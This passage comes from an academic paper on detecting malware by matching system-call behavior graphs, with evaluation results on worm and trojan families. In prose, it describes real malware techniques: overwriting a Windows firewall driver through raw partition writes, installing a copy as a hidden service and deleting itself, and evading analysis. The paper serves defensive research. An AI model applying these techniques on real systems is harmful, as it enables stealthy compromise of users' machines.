graph. Thus, when we observe at a later point the invocation of \( s_t \), we can check whether its actual argument value for \( a \) matches our precomputed value \( f_a(o_p, o_q) \). If this is the case, we have high confidence that the program executes a system call whose input is related to (depends on) the outputs of previous calls. This is the key idea of our proposed approach: We can identify relationships between system calls without tracking any information at the instruction-level during runtime. 
Instead, we rely solely on the analysis of system call arguments and the functions in the behavior graph that capture the semantics of the program. ### 3.2 Extracting Behavior Graphs As mentioned in the previous section, we express program activity as behavior graphs. In this section, we describe how these behavior graphs can be automatically constructed by observing the execution of a program in a controlled environment. #### Initial Behavior Graph As a first step, an unknown malware program is executed in an extended version of Anubis [6, 7], our dynamic malware analysis environment. Anubis records all the disassembled instructions (and the system calls) that the binary under analysis executes. We call this sequence of instructions an \textit{instruction log}. In addition, Anubis also extracts data dependencies using taint analysis. That is, the system taints (marks) each byte that is returned by a system call with a unique label. Then, we keep track of each labeled byte as the program execution progresses. This allows us to detect that the output (result) of one system call is used as an input argument for another, later system call. While the instruction log and the taint labels provide rich information about the execution of the malware program, this information is not sufficient. Consider the case in which an instruction performs an indirect memory access. That is, the instruction \textit{reads} a memory value from a location \( L \) whose address is given in a register or another memory location. In our later analysis, we need to know which instruction was the last one to \textit{write} to this location \( L \). Unfortunately, looking at the disassembled instruction alone, this is not possible. Thus, to make the analysis easier in subsequent steps, we also maintain a \textit{memory log}. This log stores, for each instruction that accesses memory, the locations that this instruction reads from and writes to. 
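A minimal sketch of such a memory log (our own illustration of the idea): each entry records which addresses an instruction read and wrote, so the last writer of a location \( L \) can be recovered during the later slicing analysis.

```python
# memory_log: (instr_index, reads, writes) entries, appended in execution
# order as the instruction log is recorded. Addresses are hypothetical.
memory_log = [
    (10, [], [0x1000]),         # instruction 10 writes location L = 0x1000
    (25, [0x2000], [0x1000]),   # instruction 25 overwrites L
    (40, [0x1000], []),         # instruction 40 reads L indirectly
]

def last_writer(log, addr, before_index):
    """Index of the last instruction that wrote addr before before_index."""
    for idx, _, writes in reversed(log):
        if idx < before_index and addr in writes:
            return idx
    return None   # value came from outside the logged execution

# The slicer asks: which instruction defined the value that instr 40 reads?
assert last_writer(memory_log, 0x1000, 40) == 25
```

This lookup is exactly what the disassembled instruction alone cannot answer for indirect memory accesses, since the effective address is only known at runtime.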
Another problem is that the previously-sketched taint tracking approach only captures data dependencies. For example, when data is written to a file that was previously read as part of a copy operation, our system would detect such a dependency. However, it does not consider control dependencies. To see why this might be relevant, consider that the amount of data written as part of the copy operation is determined by the result of a system call that returns the size of the file that is read. The file size returned by the system call might be used in a loop that controls how often a new block of data needs to be copied. While this file size has an indirect influence on the (number of) write operations, there is no data dependency. To capture indirect dependencies, our system needs to identify the scope of code blocks that are controlled by tainted data. The start of such code blocks is identified by checking for branch operations that use tainted data as arguments. To identify the end of the scope, we leverage a technique proposed by Zhang et al. [55]. More precisely, we employ their no preprocessing without caching algorithm to find convergence points in the instruction log that indicate that the different paths of a conditional statement or a loop have met, indicating the end of the (dynamic) scope. Within a tainted scope, the results of all instructions are marked with the label(s) used in the branch operation, similar to the approach presented in [22]. At this point, our analysis has gathered the complete log of all executed instructions. Moreover, operands of all instructions are marked with taint labels that indicate whether these operands have data or control dependencies on the output of previous system calls. Based on this information, we can construct an initial behavior graph. To this end, every system call is mapped into a node of the graph, labeled with the name of this system call. 
An edge is introduced from node \( x \) to node \( y \) when the output of system call \( x \) is used as an input argument by system call \( y \).

Figure 2 shows an excerpt of the trace that we recorded for Netsky. This is part of the input that the behavior graph is built from. On Line 1, one can see that the worm obtains the name of the executable of the current process (i.e., the name of its own file). Using this name, it opens the file on Line 3 and obtains a handle to it. On Line 5, a new file called AVProtect9x.exe is created, where the worm will copy its code to. On Lines 8 to 10, the worm reads its own program code, copying itself into the newly created file.

**Figure 1: Partial behavior graph for Netsky.**

In this example, the behavior graph that we generate specifically contains the string AVProtect9x.exe. However, obviously, a virus writer might choose to use random names when creating a new file. In this case, our behavior graph would contain the system calls that are used to create this random name. Hence, the randomization routines that are used (e.g., checking the current time and appending a constant string to it) would be a part of the behavior specification.

### Computing Argument Functions

In the next step, we have to compute the functions \( f \in F \) that are associated with the arguments of system call nodes. That is, for each system call argument, we first have to identify the sources that can influence the value of this argument. Also, we need to determine how the values from the sources are manipulated to derive the argument value. For this, we make use of binary program slicing. Finally, we need to translate the sequence of instructions that compute the value of an argument (based on the values of the sources) into a function. Program slicing. 
The goal of the program slicing process is to find all sources that directly or indirectly influence the value of an argument $a$ of system call $s$, which is also called a sink. To this end, we first use the function signature for $s$ to determine the type and the size of argument $a$. This allows us to determine the bytes that correspond to the sink $a$. Starting from these bytes, we use a standard dynamic slicing approach [2] to go backwards, looking for instructions that define one of these bytes. For each instruction found in this manner, we look at its operands and determine which values the instruction uses. For each value that is used, we locate the instruction that defines this value. This process is continued recursively. As mentioned previously, it is sometimes not sufficient to look at the instruction log alone to determine the instruction that has defined the value in a certain memory location. To handle these cases, we make use of the memory log, which helps us to find the previous write to a certain memory location. Following def-use chains would only include instructions that are related to the sink via data dependencies. However, we also wish to include control flow dependencies into a slice. Recall from the previous subsection that our analysis computes tainted scopes (code that has a control flow dependency on a certain tainted value). Thus, when instructions are included into a slice that are within a tainted scope, the instructions that create this scope are also included, as well as the code that those instructions depend upon. The recursive analysis chains increasingly add instructions to a slice. A chain terminates at one of two possible endpoints. One endpoint is the system call that produces a (tainted) value as output. For example, consider that we trace back the bytes that are written to a file (the argument that represents the write buffer). 
The analysis might determine that these bytes originate from a system call that reads the data from the network. That is, the values come from the “outside,” and we cannot go back any further. Of course, we expect that there are edges from all sources to the sink that eventually uses the values produced by the sources. Another endpoint is reached when a value is produced as an immediate operand of an instruction or read from the statically initialized data segment. In the previous example, the bytes that are written to the file need not have been read previously. Instead, they might be originating from a string embedded in the program binary, and thus, coming from “within.” When the program slicer finishes for a system call argument $a$, it has marked all instructions that are involved in computing the value of $a$. That is, we have a subset (a slice) of the instruction log that “explains” (1) how the value for $a$ was computed, and (2) which sources were involved. As mentioned before, these sources can be constants produced by the immediate operands of instructions, values read from memory location $addr$ (without any other instruction previously writing to this address), and the output of previous system calls. Translating slices into functions. A program slice contains all the instructions that were involved in computing a specific value for a system call argument. However, this slice is not a program (a function) that can be directly run to compute the outputs for different inputs. A slice can (and typically does) contain a single machine instruction of the binary program more than once, often with different operands. For example, consider a loop that is executed multiple times. In this case, the instructions of the binary that make up the loop body appear multiple times in the slice. However, for our function, we would like to have code that represents the loop itself, not the unrolled version. 
This is because when a different input is given to the loop, it might execute a different number of times. Thus, it is important to represent the function as the actual loop code, not as an unrolled sequence of instructions. To translate a slice into a self-contained program, we first mark all instructions in the binary that appear at least once in the slice. Note that our system handles packed binaries. That is, when a malware program is packed, we consider the instructions that it executes after the unpacking routine as the relevant binary code. All instructions that do not appear in the slice are replaced with no operation statements (nops). The input to this code depends on the sources of the slice. When a source is a constant, immediate operand, then this constant is directly included into the function. When the source is a read operation from a memory address $addr$ that was not previously written by the program, we replace it with a special function that reads the value at $addr$ when a program is analyzed. Finally, outputs of previous system calls are replaced with variables. In principle, we could now run the code as a function, simply providing as input the output values that we observe from previous system calls. This would compute a result, which is the pre-computed (expected) input argument for the sink. Unfortunately, this is not that easy. The reason is that the instructions that make up the function are taken from a binary program. This binary is made up of procedures, and these procedures set up stack frames that allow them to access local variables via offsets to the base pointer (register %ebp) or the stack pointer (x86 register %esp). The problem is that operations that manipulate the base pointer or the stack pointer are often not part of the slice. As a result, they are also not part of the function code. Unfortunately, this means that local variable accesses do not behave as expected. 
To compensate for that, we have to go through the instruction log (and the program binary) and fix the stack. More precisely, we analyze the code and add instructions that adjust the stack and, if needed, the frame pointer so that local variable accesses succeed. For this, some knowledge about compiler-specific mechanisms for handling procedures and stack frames is required. Currently, our prototype slicer is able to handle machine code generated from standard C and C++ code, as well as several human-written/optimized assembler code idioms that we encountered (for example, code that is compiled without the frame pointer). Once the necessary code is added to fix the stack, we have a function (program) at our disposal that captures the semantics of that part of the program that computes a particular system call argument based on the results of previous calls. As mentioned before, this is useful, because it allows us to pre-compute the argument of a system call that we would expect to see when an unknown program exhibits behavior that conforms to our behavior graph.

### Optimizing Functions

Once we have extracted a slice for a system call argument and translated it into a corresponding function (program), we could stop there. However, many functions implement a very simple behavior; they copy a value that is produced as output of a system call into the input argument of a subsequent call. For example, when a system call such as NtCreateFile produces an opaque handle, this handle is used as input by all subsequent system calls that operate on this file. Unfortunately, the chain of copy operations can grow quite long, involving memory accesses and stack manipulation. Thus, it would be beneficial to identify and simplify instruction sequences. Optimally, the complete sequence can be translated into a formula that allows us to directly compute the expected output based on the formula's inputs. To simplify functions, we make use of symbolic execution. 
More precisely, we assign symbolic values to the input parameters of a function and use a symbolic execution engine developed previously [23]. Once the symbolic execution of the function has finished, we obtain a symbolic expression for the output. When the symbolic execution engine does not need to perform any approximations (e.g., widening in the case of loops), then we can replace the algorithmic representation of the slice with this symbolic expression. This allows us to significantly shorten the time it takes to evaluate functions, especially those that only move values around. For complex functions, we fall back to the explicit machine code representation. 3.3 Matching Behavior Graphs For every malware program that we analyze in our controlled environment, we automatically generate a behavior graph. These graphs can then be used for detection at the end host. More precisely, for detection, we have developed a scanner that monitors the system call invocations (and arguments) of a program under analysis. The goal of the scanner is to efficiently determine whether this program exhibits activity that matches one of the behavior graphs. If such a match occurs, the program is considered malicious, and the process is terminated. We could also imagine a system that rolls back the persistent modifications that the program has performed. For this, we could leverage previous work [45] on safe execution environments. In the following, we discuss how our scanner matches a stream of system call invocations (received from the program under analysis) against a behavior graph. The scanner is a user-mode process that runs with administrative privileges. It is supported by a small kernel-mode driver that captures system calls and arguments of processes that should be monitored. In the current design, we assume that the malware process is running under the normal account of a user, and thus, cannot subvert the kernel driver or attack the scanner. 
We believe that this assumption is reasonable because, for recent versions of Windows, Microsoft has made significant effort to have users run without root privileges. Also, processes that run executables downloaded from the Internet can be automatically started in a low-integrity mode. Interestingly, we have seen malware increasingly adapting to this new landscape, and a substantial fraction can now successfully execute as a normal user. The basic approach of our matching algorithm is the following: First, we partition the nodes of a behavior graph into a set of active nodes and a set of inactive nodes. The set of active nodes contains those nodes that have already been matched with system call(s) in the stream. Initially, all nodes are inactive. When a new system call $s$ arrives, the scanner visits all inactive nodes in the behavior graph that have the correct type. That is, when a system call $\text{NtOpenFile}$ is seen, we examine all inactive nodes that correspond to an $\text{NtOpenFile}$ call. For each of these nodes, we check whether all its parent nodes are active. A parent node for node $N$ is a node that has an edge to $N$. When we find such a node, we further have to ensure that the system call has the “right” arguments. More precisely, we have to check all functions $f_i : 1 \leq i \leq k$ associated with the $k$ input arguments of the system call $s$. However, for performance reasons, we do not do this immediately. Instead, we only check the simple functions. Simple functions are those for which a symbolic expression exists. Most often, these functions check for the equality of handles. The checks for complex functions, which are functions that represent dependencies as programs, are deferred and optimistically assumed to hold. To check whether a (simple) function $f_i$ holds, we use the output arguments of the parent node(s) of $N$. More precisely, we use the appropriate values associated with the parent node(s) of $N$ as the input to $f_i$. 
When the result of $f_i$ matches the input argument to system call $s$, then we have a match. When all arguments associated with simple functions match, then node $N$ can be activated. Moreover, once $s$ returns, the values of its output parameters are stored with node $N$. This is necessary because the output of $s$ might be needed later as input for a function that checks the arguments of $N$’s child nodes. So far, we have only checked dependencies between system calls that are captured by simple functions. As a result, we might activate a node $y$ as the child of $x$, although there exists a complex dependency between these two system calls that is not satisfied by the actual program execution. Of course, at one point, we have to check these complex relationships (functions) as well. This point is reached when an interesting node in the behavior graph is activated. Interesting nodes are nodes that are (a) associated with security-relevant system calls and (b) at the “bottom” of the behavior graph. With security-relevant system calls, we refer to all calls that write to the file system, the registry, or the network. In addition, system calls that start new processes or system services are also security-relevant. A node is at the “bottom” of the behavior graph when it has no outgoing edges. When an interesting node is activated, we go back in the behavior graph and check all complex dependencies. That is, for each active node, we check all complex functions that are associated with its arguments (in a way that is similar to the case for simple functions, as outlined previously). When all complex functions hold, the node is marked as confirmed. If any of the complex functions associated with the input arguments of an active node $N$ does not hold, our previous optimistic assumption has been invalidated. Thus, we deactivate $N$ as well as all nodes in the subgraph rooted in $N$. 
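The matching procedure described above can be summarized in a simplified Python sketch (our own condensed illustration: it shows node activation, immediate checking of simple functions, deferred checking of complex functions, and deactivation on failure, but omits tainted scopes, subgraph-wide deactivation, and the kernel-driver machinery):

```python
class Node:
    def __init__(self, syscall, parents=(), simple_funcs=None,
                 complex_funcs=None, interesting=False):
        self.syscall = syscall
        self.parents = list(parents)
        self.simple_funcs = simple_funcs or {}    # arg -> f(parent_outputs)
        self.complex_funcs = complex_funcs or {}  # deferred, checked lazily
        self.interesting = interesting
        self.active = False
        self.outputs = None
        self.args = {}

def on_syscall(nodes, name, args, outputs):
    """Match one observed system call; True once an interesting node confirms."""
    for n in nodes:
        if n.active or n.syscall != name:
            continue
        if not all(p.active for p in n.parents):
            continue
        pout = [p.outputs for p in n.parents]
        # Simple (symbolic-expression) functions are checked immediately.
        if not all(f(pout) == args[a] for a, f in n.simple_funcs.items()):
            continue
        n.active, n.outputs, n.args = True, outputs, args
        if n.interesting:
            # Interesting node activated: now verify all deferred complex
            # functions over the currently active nodes.
            ok = all(f([p.outputs for p in m.parents]) == m.args[a]
                     for m in nodes if m.active
                     for a, f in m.complex_funcs.items())
            if ok:
                return True
            n.active = False   # optimistic activation revoked
    return False

# Toy graph: NtOpenFile -> NtWriteFile, where the write must use the
# handle returned by the open (the simple function is the identity).
open_n = Node("NtOpenFile")
write_n = Node("NtWriteFile", parents=[open_n],
               simple_funcs={"Handle": lambda p: p[0]}, interesting=True)
nodes = [open_n, write_n]

assert not on_syscall(nodes, "NtOpenFile", {}, 7)    # root node activates
assert not on_syscall(nodes, "NtWriteFile", {"Handle": 9}, None)  # no flow
assert on_syscall(nodes, "NtWriteFile", {"Handle": 7}, None)      # match
```

The deferral of complex functions mirrors the performance argument in the text: expensive program-slice evaluation only happens once an interesting node fires, not on every incoming call.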
Intuitively, we use the concept of interesting nodes to capture the case in which a malware program has demonstrated a chain of activities that involve a series of system calls with non-trivial dependencies between them. Thus, we declare a match as soon as any interesting node has been confirmed. However, to avoid cases of overly generic behavior graphs, we only report a program as malware when the process of confirming an interesting node involves at least one complex dependency. Since the confirmed activation of a single interesting node is enough to detect a malware sample, typically only a subset of the behavior graph of a malware sample is employed for detection. More precisely, each interesting node, together with all of its ancestor nodes and the dependencies between these nodes, can be used for detection independently. Each of these subgraphs is itself a behavior graph that describes a specific set of actions performed by a malware program (that is, a certain behavioral trait of this malware). 4 Evaluation We claim that our system delivers effective detection with an acceptable performance overhead. In this section, we first analyze the detection capabilities of our system. Then, we examine the runtime impact of our prototype implementation. In the last section, we describe two examples of behavior graphs in more detail. <table> <thead> <tr> <th>Name</th> <th>Type</th> </tr> </thead> <tbody> <tr> <td>Allaple</td> <td>Exploit-based worm</td> </tr> <tr> <td>Bagle</td> <td>Mass-mailing worm</td> </tr> <tr> <td>Mytob</td> <td>Mass-mailing worm</td> </tr> <tr> <td>Agent</td> <td>Trojan</td> </tr> <tr> <td>Netsky</td> <td>Mass-mailing worm</td> </tr> <tr> <td>Mydoom</td> <td>Mass-mailing worm</td> </tr> </tbody> </table> Table 1: Malware families used for evaluation. 4.1 Detection Effectiveness To demonstrate that our system is effective in detecting malicious code, we first generated behavior graphs for six popular malware families. 
An overview of these families is provided in Table 1. These malware families were selected because they are very popular, both in our own malware data collection (which we obtained from Anubis [1]) and according to lists compiled by anti-virus vendors. Moreover, these families provide a good cross section of popular malware classes, such as mail-based worms, exploit-based worms, and a Trojan horse. Some of the families use code polymorphism to make it harder for signature-based scanners to detect them. For each malware family, we randomly selected 100 samples from our database. The selection was based on the labels produced by the Kaspersky anti-virus scanner and included different variants for each family. During the selection process, we discarded samples that, in our test environment, did not exhibit any interesting behavior. Specifically, we discarded samples that did not modify the file system, spawn new processes, or perform network communication. For the Netsky family, only 63 different samples were available in our dataset. <table> <thead> <tr> <th>Name</th> <th>Samples</th> <th>Kaspersky variants</th> <th>Our variants</th> <th>Samples detected</th> <th>Effectiveness</th> </tr> </thead> <tbody> <tr> <td>Allaple</td> <td>50</td> <td>2</td> <td>1</td> <td>50</td> <td>1.00</td> </tr> <tr> <td>Bagle</td> <td>50</td> <td>20</td> <td>14</td> <td>46</td> <td>0.92</td> </tr> <tr> <td>Mytob</td> <td>50</td> <td>32</td> <td>12</td> <td>47</td> <td>0.94</td> </tr> <tr> <td>Agent</td> <td>50</td> <td>20</td> <td>2</td> <td>41</td> <td>0.82</td> </tr> <tr> <td>Netsky</td> <td>50</td> <td>22</td> <td>12</td> <td>46</td> <td>0.92</td> </tr> <tr> <td>Mydoom</td> <td>50</td> <td>6</td> <td>3</td> <td>49</td> <td>0.98</td> </tr> <tr> <td>Total</td> <td>300</td> <td>102</td> <td>44</td> <td>279</td> <td>0.93</td> </tr> </tbody> </table> Table 2: Training dataset. Detection capabilities. For each of our six malware families, we randomly selected 50 samples.
These samples were then used for the extraction of behavior graphs. Table 2 provides some details on the training dataset. The “Kaspersky variants” column shows the number of different variants (labels) identified by the Kaspersky anti-virus scanner (these are variants such as Netsky.k or Netsky.aa). The “Our variants” column shows the number of different samples from which (different) behavior graphs had to be extracted before the training dataset was covered. Interestingly, as shown by the “Samples detected” column, it was not possible to extract behavior graphs for the entire training set. The reasons for this are twofold: First, some samples did not perform any interesting activity during behavior graph extraction (despite the fact that they did show relevant behavior during the initial selection process). Second, for some malware programs, our system was not able to extract valid behavior graphs. This is due to limitations of the current prototype that produced invalid slices (i.e., functions that simply crashed when executed). To evaluate the detection effectiveness of our system, we used the behavior graphs extracted from the training dataset to perform detection on the remaining 263 samples (the test dataset). The results are shown in Table 3. It can be seen that some malware families, such as Allaple and Mydoom, can be detected very accurately. For others, the results appear worse. However, we have to consider that different malware variants may exhibit different behavior, so it may be unrealistic to expect that a behavior graph for one variant always matches samples belonging to another variant. This is further exacerbated by the fact that anti-virus software is not particularly good at classifying malware (a problem that has also been discussed in previous work [5]). As a result, the dataset likely contains mislabeled programs that belong to different malware families altogether. 
This was confirmed by manual inspection, which revealed that certain malware families (in particular, the Agent family) contain a large number of variants with widely varying behavior. To confirm that different malware variants are indeed the root cause of the lower detection effectiveness, we then restricted our analysis to the 155 samples in the test dataset that belong to “known” variants. That is, we only considered those samples that belong to malware variants that are also present in the training dataset (according to Kaspersky labels). For this dataset, we obtain a detection effectiveness of 0.92. This is very similar to the result of 0.93 obtained on the training dataset. Conversely, if we restrict our analysis to the 108 samples that do not belong to a known variant, we obtain a detection effectiveness of only 0.23. While this value is significantly lower, it still demonstrates that our system is sometimes capable of detecting malware belonging to previously unknown variants. Together with the number of variants shown in Table 2, this indicates that our tool produces a behavior-based malware classification that is more general than that produced by an anti-virus scanner, and therefore, requires a smaller number of behavior graphs than signatures. 
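The effectiveness figures quoted throughout this section are simply the fraction of samples detected. As a quick arithmetic check against the per-family numbers in Table 3:

```python
# Detection effectiveness = detected / samples, per family and overall.
# Numbers are taken from Table 3 (test dataset).
test_set = {            # family: (samples, detected)
    "Allaple": (50, 45), "Bagle": (50, 30), "Mytob": (50, 36),
    "Agent": (50, 5), "Netsky": (13, 7), "Mydoom": (50, 45),
}
samples = sum(s for s, _ in test_set.values())
detected = sum(d for _, d in test_set.values())
print(samples, detected, round(detected / samples, 2))   # 263 168 0.64
```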
<table> <thead> <tr> <th>Name</th> <th>Samples</th> <th>Known variant samples</th> <th>Samples detected</th> <th>Effectiveness</th> </tr> </thead> <tbody> <tr> <td>Allaple</td> <td>50</td> <td>50</td> <td>45</td> <td>0.90</td> </tr> <tr> <td>Bagle</td> <td>50</td> <td>26</td> <td>30</td> <td>0.60</td> </tr> <tr> <td>Mytob</td> <td>50</td> <td>26</td> <td>36</td> <td>0.72</td> </tr> <tr> <td>Agent</td> <td>50</td> <td>4</td> <td>5</td> <td>0.10</td> </tr> <tr> <td>Netsky</td> <td>13</td> <td>5</td> <td>7</td> <td>0.54</td> </tr> <tr> <td>Mydoom</td> <td>50</td> <td>44</td> <td>45</td> <td>0.90</td> </tr> <tr> <td>Total</td> <td>263</td> <td>155</td> <td>168</td> <td>0.64</td> </tr> </tbody> </table> Table 3: Detection effectiveness. **False positives.** In the next step, we attempted to evaluate the amount of false positives that our system would produce. For this, we installed a number of popular applications on our test machine, which runs Microsoft Windows XP and our scanner. More precisely, we used Internet Explorer, Firefox, Thunderbird, putty, and Notepad. For each of these applications, we went through a series of common use cases. For example, we surfed the web with IE and Firefox, sent a mail with Thunderbird (including an attachment), performed a remote ssh login with putty, and used notepad for writing and saving text. No false positives were raised in these tests. This was expected, since our models typically capture quite tightly the behavior of the individual malware families. However, if we omitted the checks for complex functions and assumed all complex dependencies in the behavior graph to hold, all of the above applications raised false positives. This shows that our tool’s ability to capture arbitrary data-flow dependencies and verify them at runtime is essential for effective detection. 
It also indicates that, in general, system call information alone (without considering complex relationships between their arguments) might not be sufficient to distinguish between legitimate and malicious behavior. In addition to the Windows applications mentioned previously, we also installed a number of tools for performance measurement, as discussed in the following section. While running the performance tests, we also did not experience any false positives. **4.2 System Efficiency** Like every malware scanner, our detection mechanism stands or falls by the performance degradation it causes on a running system. To evaluate the performance impact of our detection mechanism, we used 7-zip, a well-known compression utility, Microsoft Internet Explorer, and Microsoft Visual Studio. We performed the tests on a single-core, 1.8 GHz Pentium 4 running Windows XP with 1 GB of RAM. For the first test, we used a command line option for 7-zip that makes it run a simple benchmark. This reflects the case in which an application is mostly performing CPU-bound computation. In another test, 7-zip was used to compress a folder that contains 215 MB of data (6,859 files in 808 subfolders). This test represents a more mixed workload. The third test consisted of using 7-zip to archive three copies of this same folder, performing no compression. This is a purely IO-bound workload. The next test measures the number of pages per second that could be rendered in Internet Explorer. For this test, we used a local copy of a large (1.5 MB) web page [3]. For the final test, we measured the time required to compile and build our scanner tool using Microsoft Visual Studio. The source code of this tool consists of 67 files and over 17,000 lines of code. For all tests, we first ran the benchmark on the unmodified operating system (to obtain a baseline). Then, we enabled the kernel driver that logs system call parameters, but did not enable any user-mode detection processing of this output.
Finally, we also enabled our malware detector with the full set of 44 behavior graphs. The results are summarized in Table 4. As can be seen, our tool has a very low overhead (below 5%) for CPU-bound benchmarks. Also, it performs well in the I/O-bound experiment (with less than 10% overhead). The worst performance occurs in the compilation benchmark, where the system incurs an overhead of 39.8%. It may seem surprising at first that our tool performs worse in this benchmark than in the I/O-bound archive benchmark. However, during compilation, the scanned application is performing almost 5,000 system calls per second, while in the archive benchmark, this value is around 700. Since the amount of computation performed in user-mode by our scanner increases with the number of system calls, compilation is a worst-case scenario for our tool. Furthermore, the more varied workload in the compile benchmark causes more complex functions to be evaluated. The 39.8% overhead of the compile benchmark can further be broken down into 12.2% for the kernel driver, 16.7% for the evaluation of complex functions, and 10.9% for the remaining user-mode processing. Note that the high cost of complex function evaluation could be reduced by improving our symbolic execution engine, so that fewer complex functions need to be evaluated. Furthermore, our prototype implementation spawns a new process every time the verification of complex dependencies is triggered, causing unnecessary overhead. Nevertheless, we feel that our prototype performs well for common tasks, and the current overhead allows the system to be used on (most) end users' hosts. Moreover, even in the worst case, the tool incurs significantly less overhead than systems that perform dynamic taint propagation (where the overhead is typically several times the baseline).
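The compile-benchmark overhead decomposes additively into the three components just listed, which is easy to verify:

```python
# The 39.8% compile-benchmark overhead is the sum of its three parts
# (percentages from the breakdown given in the text).
kernel_driver = 12.2      # in-kernel system-call logging
complex_funcs = 16.7      # evaluating complex dependency functions
user_mode     = 10.9      # remaining user-mode processing
total = kernel_driver + complex_funcs + user_mode
print(round(total, 1))    # 39.8
```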
### 4.3 Examples of Behavior Graphs To provide a better understanding of the type of behavior that is modeled by our system, we provide a short description of two behavior graphs extracted from variants of the Agent and Allaple malware families. **Agent.ffn.StartService.** The Agent.ffn variant contains a resource section that stores chunks of binary data. During execution, the binary queries for one of these stored resources and processes its content with a simple, custom decryption routine. This routine uses a variant of XOR decryption with a key that changes as the decryption proceeds. In a later step, the decrypted data is used to overwrite the Windows system file `\C:\WINDOWS\System32\drivers\ip6fw.sys`. Interestingly, rather than directly writing to the file, the malware opens the `\C:` logical partition at the offset where the `ip6fw.sys` file is stored, and directly writes to that location. Finally, the malware restarts Windows XP’s integrated IPv6 firewall service, effectively executing the previously decrypted code. Figure 3 shows a simplified behavior graph that captures this behavior. The graph contains nine nodes, connected through ten dependencies: six simple dependencies representing the reuse of previously obtained object handles (annotated with the parameter name), and four complex dependencies. The complex dependency that captures the previously described decryption routine is indicated by a bold arrow in Figure 3. Here, the LockResource function provides the body of the encrypted resource section. The NtQueryInformationFile call provides information about the `ip6fw.sys` file. The `\C:` logical partition is opened in the NtCreateFile node. Finally, the NtWriteFile system call overwrites the firewall service program with malicious code. The check of the complex dependency is triggered by the activation of the last node (bold in the figure). 
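The text describes Agent.ffn's decryption only as "a variant of XOR decryption with a key that changes as the decryption proceeds"; the exact key-update rule is not given. A routine of that general shape can be sketched as follows, with a purely illustrative update rule (add the ciphertext byte, wrap to 8 bits) standing in for the malware's undocumented scheme:

```python
def rolling_xor_encrypt(data: bytes, key: int) -> bytes:
    # XOR each byte with an evolving key. The key is updated from the
    # *ciphertext* byte so that encryption and decryption see the same
    # key stream. The update rule here is an illustrative assumption.
    out = bytearray()
    for b in data:
        c = b ^ (key & 0xFF)
        out.append(c)
        key = (key + c) & 0xFF        # key changes as processing proceeds
    return bytes(out)

def rolling_xor_decrypt(data: bytes, key: int) -> bytes:
    # Inverse: XOR with the same evolving key, updated from each
    # ciphertext byte before moving on.
    out = bytearray()
    for b in data:
        out.append(b ^ (key & 0xFF))
        key = (key + b) & 0xFF
    return bytes(out)

plain = b"MZ\x90\x00"                 # arbitrary sample bytes
assert rolling_xor_decrypt(rolling_xor_encrypt(plain, 0x5A), 0x5A) == plain
```

The point of such a routine for detection is that no single symbolic expression relates input to output, which is exactly why the system represents this dependency as a complex function (an executable slice) rather than a simple one.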
**Figure 3: Behavior graph for Agent.ffn.** **Figure 4: Behavior graph for Allaple.b.** Allaple.b.CreateProcess. Once started, the Allaple.b variant copies itself to the file c:\WINDOWS\system32\urdvxc.exe. Then, it invokes this executable various times with different command-line arguments. First, urdvxc.exe /installservice and urdvxc.exe /start are used to execute stealthily as a system service. In a second step, the malware tries to remove its traces by eliminating the original binary. This is done by calling urdvxc.exe /uninstallservice patch:<binary> (where <binary> is the name of the originally started program). The graph shown in Figure 4 models part of this behavior. In the NtCreateFile node, the urdvxc.exe file is created. This file is then invoked three times with different arguments, resulting in three almost identical subgraphs. The box on the right-hand side of Figure 4 is an enlargement of one of these subgraphs. Here, the NtCreateProcessEx node represents the invocation of the urdvxc.exe program. The argument to the uninstall command (i.e., the name of the original binary) is supplied by the GetModuleFileName function to the NtCreateThread call. The last NtResumeThread system call triggers the verification of the complex dependencies. 5 Limitations In this section, we discuss the limitations of and possible attacks against our current system. Furthermore, we discuss possible solutions to address these limitations. Evading signature generation. A main premise of our system is that we can observe a sample's malicious activities inside our system emulator. Furthermore, we must be able to find taint dependencies between data sources and the corresponding sinks. If a malware program manages to circumvent either of these two required steps, our system cannot generate system call signatures or find a starting point for the slicing process. Note that our system is based on an unaccelerated version of Qemu.
Since this is a system emulator (i.e., not a virtual machine), certain trivial means of detecting the virtual environment (such as Red Pill, as described in [36]) are not applicable. Detecting a system emulator is an arms race against the accuracy of the emulator itself. Malware authors could also use delays, time-triggered behavior, or command and control mechanisms to try to prevent the malware from performing any malicious actions during our analysis. This is indeed the fundamental limitation of all dynamic approaches to the analysis of malicious code. For taint label propagation, we implemented both data- and control-dependent propagation and pursue a conservative approach to avoid the loss of taint information as much as possible. Our results show that we are able to deal well with current malware. However, as soon as we observe threats in the wild targeting this feature of our system, we would need to adapt our approach. Modifying the algorithm (input-output) behavior. Our system's main focus lies on the detection of data input-output relations and the malicious algorithm that the malware author has created (e.g., a propagation technique). As soon as a malware writer implements a new algorithm (e.g., using a different propagation approach), our slices would not be usable for this new malware type. However, note that completely modifying the malicious algorithms contained in a program requires considerable manual work, as this process is difficult to automate. As a result, our system raises the bar significantly for the malware author and makes this process more costly. 6 Related Work There is a large body of previous work that studies the behavior [34, 37, 42] or the prevalence [31, 35] of different types of malware. Moreover, there are several systems [6, 47, 53, 54] that aid an analyst in understanding the actions that a malware program performs.
Furthermore, techniques have been proposed to classify malware based on its behavior using a supervised [39] or unsupervised [5, 7] learning approach. In this paper, we propose a novel technique to effectively and efficiently identify malicious code on the end host. Thus, we focus on related work in the area of malware detection. Network detection. One line of research focuses on the development of systems that detect malicious code at the network level. Most of these systems [20, 32, 33] use content-based signatures that specify tokens that are characteristic of certain malware families. Other approaches check for anomalous connections [19] or for network traffic that has suspicious properties [49]. While network-based detection has the advantage that a single sensor can monitor the traffic to multiple machines, there are a number of drawbacks. First, malware has significant freedom in altering network traffic, and can thus evade detection [17, 46]. Second, not all malware programs use the network to carry out their nefarious tasks. Third, even when an infected host is identified, additional action is necessary to terminate the malware program. Static analysis. The traditional approach to detecting malware on the end host (which is implemented by anti-virus software) is based on statically scanning executables for strings or instruction sequences that are characteristic of a malware sample [46]. These strings are typically extracted from the analysis of individual programs. The problem is that such strings are typically specific to the syntactic appearance of a certain malware instance. Using code polymorphism and obfuscation, malware programs can alter their appearance while keeping their behavior (functionality) unchanged [11, 46]. As a result, they can easily evade signature-based scanners. As a reaction to the limitations of signature-based detection, researchers have proposed a number of higher-order properties to describe executables.
